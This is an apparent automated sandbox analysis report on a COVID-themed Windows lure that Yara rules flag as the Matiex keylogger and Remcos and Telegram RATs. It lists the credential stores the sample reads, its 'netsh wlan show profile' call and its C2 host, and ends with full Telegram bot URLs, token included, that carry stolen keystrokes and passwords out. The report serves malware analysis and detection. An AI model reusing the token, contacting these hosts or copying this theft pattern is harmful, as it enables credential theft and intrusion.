Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Queries volume information: C:\Users\user\AppData\Local\Temp\dwnl.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00402832 Sleep,GetLocalTime,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,printf,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 28_2_00402832
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040E549 GetComputerNameExW,GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 28_2_0040E549

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile

Stealing of Sensitive Information:

barindex
Yara detected Matiex Keylogger
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.0.dwnl.exe.842704.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.dwnl.exe.842704.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2fcf496.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.dwnl.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.0.dwnl.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2faeb92.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000021.00000000.430155447.0000000000822000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.424932368.0000000002FAF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.492777549.0000000000822000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.464230298.0000000002ED1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.424995684.0000000002ED1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.432421502.0000000002ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.464012145.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429908152.0000000002ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6720, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\dwnl.exe, type: DROPPED
Yara detected Telegram RAT
Source: Yara match File source: 00000021.00000002.499333644.0000000002D0B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dwnl.exe PID: 2896, type: MEMORYSTR
Yara detected Remcos RAT
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3ed9988.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418169362.0000000002F23000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.468948804.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429721772.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429209935.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.432136781.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418954944.0000000003ED9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.419012391.0000000003F25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.467780819.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418279701.0000000002F5D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6720, type: MEMORYSTR
Contains functionality to steal Firefox passwords or cookies
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 28_2_004057B6
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: \key3.db 28_2_004057B6
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to harvest and steal WLAN passwords
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile Jump to behavior
Contains functionality to steal Chrome passwords or cookies
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 28_2_00405622
Yara detected Credential Stealer
Source: Yara match File source: 00000021.00000002.499333644.0000000002D0B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dwnl.exe PID: 2896, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected Matiex Keylogger
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.0.dwnl.exe.842704.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.dwnl.exe.842704.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2fcf496.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.dwnl.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.0.dwnl.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2faeb92.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000021.00000000.430155447.0000000000822000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.424932368.0000000002FAF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.492777549.0000000000822000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.464230298.0000000002ED1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.424995684.0000000002ED1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.432421502.0000000002ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.464012145.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429908152.0000000002ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6720, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\dwnl.exe, type: DROPPED
Yara detected Telegram RAT
Source: Yara match File source: 00000021.00000002.499333644.0000000002D0B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dwnl.exe PID: 2896, type: MEMORYSTR
Yara detected Remcos RAT
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3ed9988.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418169362.0000000002F23000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.468948804.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429721772.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429209935.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.432136781.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418954944.0000000003ED9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.419012391.0000000003F25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.467780819.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418279701.0000000002F5D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6720, type: MEMORYSTR
Detected Remcos RAT
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.418169362.0000000002F23000.00000004.00000001.sdmp String found in binary or memory: Remcos_Mutex_Inj
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.418169362.0000000002F23000.00000004.00000001.sdmp String found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
Source: UK COVID UPDATES AND ENTITLEMENT.exe String found in binary or memory: Remcos_Mutex_Inj
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp String found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
Contains functionality to launch a control a shell (cmd.exe)
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: cmd.exe 28_2_0040E8B9
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 481891 Sample: UK COVID UPDATES AND ENTITL... Startdate: 13/09/2021 Architecture: WINDOWS Score: 100 44 youtube-ui.l.google.com 2->44 46 www.youtube.com 2->46 48 www.google.com 2->48 66 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->66 68 Multi AV Scanner detection for domain / URL 2->68 70 Found malware configuration 2->70 72 20 other signatures 2->72 10 UK COVID UPDATES AND ENTITLEMENT.exe 6 2->10         started        signatures3 process4 file5 36 C:\...\UK COVID UPDATES AND ENTITLEMENT.exe, PE32 10->36 dropped 38 UK COVID UPDATES A...exe:Zone.Identifier, ASCII 10->38 dropped 40 UK COVID UPDATES AND ENTITLEMENT.exe.log, ASCII 10->40 dropped 82 Writes to foreign memory regions 10->82 84 Injects a PE file into a foreign processes 10->84 14 UK COVID UPDATES AND ENTITLEMENT.exe 1 3 10->14         started        18 powershell.exe 18 10->18         started        20 UK COVID UPDATES AND ENTITLEMENT.exe 10->20         started        22 5 other processes 10->22 signatures6 process7 dnsIp8 58 tobi12345.hopto.org 91.193.75.202, 40401, 49777 DAVID_CRAIGGG Serbia 14->58 42 C:\Users\user\AppData\Local\Temp\dwnl.exe, PE32 14->42 dropped 24 dwnl.exe 15 5 14->24         started        28 WerFault.exe 14->28         started        60 youtube-ui.l.google.com 18->60 62 www.youtube.com 18->62 64 www.google.com 18->64 30 conhost.exe 18->30         started        file9 process10 dnsIp11 50 checkip.dyndns.org 24->50 52 api.telegram.org 149.154.167.220, 443, 49788, 49789 TELEGRAMRU United Kingdom 24->52 56 2 other IPs or domains 24->56 74 Antivirus detection for dropped file 24->74 76 May check the online IP address of the machine 24->76 78 Tries to steal Mail credentials (via file access) 24->78 80 5 other signatures 24->80 32 netsh.exe 24->32         started        54 192.168.2.1 unknown unknown 28->54 signatures12 process13 process14 34 conhost.exe 32->34         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
158.101.44.242
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false
91.193.75.202
 tobi12345.hopto.org Serbia
209623 DAVID_CRAIGGG true
172.67.188.154
 freegeoip.app United States
13335 CLOUDFLARENETUS false

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
youtube-ui.l.google.com 172.217.20.14 true
tobi12345.hopto.org 91.193.75.202 true
www.google.com 142.250.201.196 true
freegeoip.app 172.67.188.154 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 158.101.44.242 true
checkip.dyndns.org unknown unknown
www.youtube.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F false
    		high
    tobi12345.hopto.org true
    • 10%, Virustotal, Browse
    • Avira URL Cloud: safe
    		 unknown
    https://api.telegram.org/bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C false
      		high
      http://checkip.dyndns.org/ false
      • URL Reputation: safe
      		 unknown
      https://api.telegram.org/bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C false
        		high
        https://freegeoip.app/xml/84.17.52.51 false
        • Avira URL Cloud: safe
        		 unknown
        https://api.telegram.org/bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C false
          		high